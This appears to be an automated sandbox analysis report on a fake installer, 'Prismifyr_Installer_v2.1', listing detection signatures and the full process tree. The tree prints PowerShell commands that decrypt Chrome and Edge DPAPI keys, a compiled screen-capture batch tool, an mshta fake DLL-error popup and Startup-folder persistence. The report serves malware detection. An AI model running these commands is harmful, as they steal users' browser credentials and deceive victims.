Edit tour
Windows
Analysis Report
Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected generic credential text file
Drops PE files to the startup folder
Drops large PE files
Sigma detected: MSHTA Suspicious Execution 01
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Prismifyr_Installer_v2.1 Setup 1.0.0.exe (PID: 5376 cmdline:
"C:\Users\ user\Deskt op\Prismif yr_Install er_v2.1 Se tup 1.0.0. exe" MD5: FE0DDF8159F4A56D194F90E1FB31F3B2)
- Prismifyr_Installer_v2.1.exe (PID: 64 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\Pr ismifyr_In staller_v2 .1\Prismif yr_Install er_v2.1.ex e" MD5: F90856B824B429A51D390C25F21C9683) - cmd.exe (PID: 2884 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist /fo csv" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 4836 cmdline:
tasklist / fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - Prismifyr_Installer_v2.1.exe (PID: 5708 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\Pr ismifyr_In staller_v2 .1\Prismif yr_Install er_v2.1.ex e" --type= gpu-proces s --user-d ata-dir="C :\Users\us er\AppData \Roaming\P rismifyr_I nstaller_v 2.1" --gpu -preferenc es=UAAAAAA AAADgAAAMA AAAAAAAAAA AAAAAAABgA AEAAAAAAAA ABAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAABA AAAAAAAAAE AAAAAAAAAA IAAAAAAAAA AgAAAAAAAA A --field- trial-hand le=2244,i, 1491236102 2600860785 ,909577236 2069922900 ,262144 -- disable-fe atures=Spa reRenderer ForSitePer Process,Wi nDelaySpel lcheckServ iceInit,Wi nRetrieveS uggestions OnlyOnDema nd --varia tions-seed -version - -mojo-plat form-chann el-handle= 2236 /pref etch:2 MD5: F90856B824B429A51D390C25F21C9683) - cmd.exe (PID: 2220 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6472 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - Prismifyr_Installer_v2.1.exe (PID: 6404 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\Pr ismifyr_In staller_v2 .1\Prismif yr_Install er_v2.1.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --u ser-data-d ir="C:\Use rs\user\Ap pData\Roam ing\Prismi fyr_Instal ler_v2.1" --field-tr ial-handle =2516,i,14 9123610226 00860785,9 0957723620 69922900,2 62144 --di sable-feat ures=Spare RendererFo rSitePerPr ocess,WinD elaySpellc heckServic eInit,WinR etrieveSug gestionsOn lyOnDemand --variati ons-seed-v ersion --m ojo-platfo rm-channel -handle=25 12 /prefet ch:3 MD5: F90856B824B429A51D390C25F21C9683) - cmd.exe (PID: 2864 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,82,140,1 81,59,205, 133,36,68, 131,195,71 ,114,10,9, 65,24,16,0 ,0,0,28,0, 0,0,71,0,1 11,0,111,0 ,103,0,108 ,0,101,0,3 2,0,67,0,1 04,0,114,0 ,111,0,109 ,0,101,0,0 ,0,16,102, 0,0,0,1,0, 0,32,0,0,0 ,36,243,11 2,255,236, 176,19,21, 161,232,5, 156,15,224 ,214,169,1 85,79,161, 35,240,200 ,160,226,1 60,19,168, 214,186,23 9,155,235, 0,0,0,0,14 ,128,0,0,0 ,2,0,0,32, 0,0,0,225, 241,231,19 5,97,47,24 8,22,206,1 61,226,92, 44,44,51,2 07,166,8,4 6,136,147, 185,84,185 ,27,183,25 2,114,164, 252,148,16 8,48,0,0,0 ,2,140,235 ,235,139,9 9,133,55,1 60,143,64, 53,168,135 ,193,81,10 ,81,94,101 ,239,145,7 2,8,97,176 ,119,236,1 64,201,155 ,27,236,18 4,11,80,14 5,31,10,79 ,199,92,71 ,166,116,8 4,131,150, 64,0,0,0,3 3,136,240, 246,163,86 ,84,202,92 ,12,170,23 9,80,17,93 ,81,235,15 9,209,41,5 ,212,210,2 3,106,50,3 1,57,94,24 4,205,86,1 98,111,237 ,171,160,2 40,77,231, 4,197,113, 175,235,15 3,59,29,17 6,183,188, 244,160,18 6,186,93,1 46,97,116, 126,129,24 ,71,225), $null, 'Cu rrentUser' )" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4184 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,82,140 ,181,59,20 5,133,36,6 8,131,195, 71,114,10, 9,65,24,16 ,0,0,0,28, 0,0,0,71,0 ,111,0,111 ,0,103,0,1 08,0,101,0 ,32,0,67,0 ,104,0,114 ,0,111,0,1 09,0,101,0 ,0,0,16,10 2,0,0,0,1, 0,0,32,0,0 ,0,36,243, 112,255,23 6,176,19,2 1,161,232, 5,156,15,2 24,214,169 ,185,79,16 1,35,240,2 00,160,226 ,160,19,16 8,214,186, 239,155,23 5,0,0,0,0, 14,128,0,0 ,0,2,0,0,3 2,0,0,0,22 5,241,231, 195,97,47, 248,22,206 ,161,226,9 2,44,44,51 ,207,166,8 ,46,136,14 7,185,84,1 85,27,183, 252,114,16 4,252,148, 168,48,0,0 ,0,2,140,2 35,235,139 ,99,133,55 ,160,143,6 4,53,168,1 35,193,81, 10,81,94,1 01,239,145 ,72,8,97,1 76,119,236 ,164,201,1 55,27,236, 184,11,80, 145,31,10, 79,199,92, 71,166,116 ,84,131,15 0,64,0,0,0 ,33,136,24 0,246,163, 86,84,202, 92,12,170, 239,80,17, 93,81,235, 159,209,41 ,5,212,210 ,23,106,50 ,31,57,94, 244,205,86 ,198,111,2 37,171,160 ,240,77,23 1,4,197,11 3,175,235, 153,59,29, 176,183,18 8,244,160, 186,186,93 ,146,97,11 6,126,129, 24,71,225) , $null, ' CurrentUse r') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7028 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,82,140,1 81,59,205, 133,36,68, 131,195,71 ,114,10,9, 65,24,16,0 ,0,0,30,0, 0,0,77,0,1 05,0,99,0, 114,0,111, 0,115,0,11 1,0,102,0, 116,0,32,0 ,69,0,100, 0,103,0,10 1,0,0,0,16 ,102,0,0,0 ,1,0,0,32, 0,0,0,73,2 31,212,88, 131,180,10 8,13,7,151 ,85,6,156, 66,67,185, 57,141,176 ,137,39,15 3,232,122, 3,148,29,9 7,139,226, 146,101,0, 0,0,0,14,1 28,0,0,0,2 ,0,0,32,0, 0,0,25,208 ,58,196,14 7,38,229,7 1,17,84,57 ,121,51,12 2,21,191,1 92,210,223 ,56,196,10 2,132,177, 163,7,170, 237,170,96 ,43,123,48 ,0,0,0,22, 214,107,18 0,137,106, 64,43,246, 209,3,97,1 83,60,179, 87,35,178, 252,209,63 ,28,6,231, 92,233,101 ,110,37,19 1,114,95,1 02,37,85,2 5,129,162, 60,71,136, 36,115,191 ,138,222,1 ,225,64,0, 0,0,221,12 8,244,169, 226,245,40 ,30,145,23 2,4,127,24 0,108,165, 92,23,225, 199,246,49 ,201,112,9 7,127,7,10 8,202,49,1 41,230,234 ,32,54,72, 203,159,33 ,237,81,19 5,247,232, 115,207,19 4,239,99,1 14,230,169 ,121,178,1 34,199,77, 110,131,11 5,20,107,2 31,17,6), $null, 'Cu rrentUser' )" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4836 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,82,140 ,181,59,20 5,133,36,6 8,131,195, 71,114,10, 9,65,24,16 ,0,0,0,30, 0,0,0,77,0 ,105,0,99, 0,114,0,11 1,0,115,0, 111,0,102, 0,116,0,32 ,0,69,0,10 0,0,103,0, 101,0,0,0, 16,102,0,0 ,0,1,0,0,3 2,0,0,0,73 ,231,212,8 8,131,180, 108,13,7,1 51,85,6,15 6,66,67,18 5,57,141,1 76,137,39, 153,232,12 2,3,148,29 ,97,139,22 6,146,101, 0,0,0,0,14 ,128,0,0,0 ,2,0,0,32, 0,0,0,25,2 08,58,196, 147,38,229 ,71,17,84, 57,121,51, 122,21,191 ,192,210,2 23,56,196, 102,132,17 7,163,7,17 0,237,170, 96,43,123, 48,0,0,0,2 2,214,107, 180,137,10 6,64,43,24 6,209,3,97 ,183,60,17 9,87,35,17 8,252,209, 63,28,6,23 1,92,233,1 01,110,37, 191,114,95 ,102,37,85 ,25,129,16 2,60,71,13 6,36,115,1 91,138,222 ,1,225,64, 0,0,0,221, 128,244,16 9,226,245, 40,30,145, 232,4,127, 240,108,16 5,92,23,22 5,199,246, 49,201,112 ,97,127,7, 108,202,49 ,141,230,2 34,32,54,7 2,203,159, 33,237,81, 195,247,23 2,115,207, 194,239,99 ,114,230,1 69,121,178 ,134,199,7 7,110,131, 115,20,107 ,231,17,6) , $null, ' CurrentUse r') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4924 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c ""C :\Users\us er\AppData \Local\Tem p\screenCa pture\scre enCapture_ 1.3.2.bat" "C:\Users \user\AppD ata\Local\ Temp\20249 24-64-ysws zl.55ad9.p ng" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 2988 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe /nolog o /r:"Micr osoft.Visu alBasic.dl l" /win32m anifest:"a pp.manifes t" /out:"s creenCaptu re_1.3.2.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\SC REEN~1\SCR EEN~1.BAT" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 3940 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S9E2A.tmp" "c:\Users \user\AppD ata\Local\ Temp\scree nCapture\C SCEE08CA83 D7542AAB04 A7698A66EC D4F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - screenCapture_1.3.2.exe (PID: 2736 cmdline:
screenCapt ure_1.3.2. exe "C:\Us ers\user\A ppData\Loc al\Temp\20 24924-64-y swszl.55ad 9.png" MD5: 18CDE4CFC9C121CC421152F9F86AED6B) - cmd.exe (PID: 5360 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6076 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7008 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "st art /B cmd /c mshta "javascrip t:new Acti veXObject( 'WScript.S hell').Pop up('The pr ogram can not start because MS VCP140.dll is missin g from you r computer . Try rein stalling t he program to fix th is problem .', 0, 'Er ror', 16); close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1512 cmdline:
cmd /c msh ta "javasc ript:new A ctiveXObje ct('WScrip t.Shell'). Popup('The program c an not sta rt because MSVCP140. dll is mis sing from your compu ter. Try r einstallin g the prog ram to fix this prob lem.', 0, 'Error', 1 6);close() " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - mshta.exe (PID: 4888 cmdline:
mshta "jav ascript:ne w ActiveXO bject('WSc ript.Shell ').Popup(' The progra m can not start beca use MSVCP1 40.dll is missing fr om your co mputer. Tr y reinstal ling the p rogram to fix this p roblem.', 0, 'Error' , 16);clos e()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- Prismifyr_Installer_v2.1.exe (PID: 5832 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\Pri smifyr_Ins taller_v2. 1.exe" MD5: F90856B824B429A51D390C25F21C9683)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |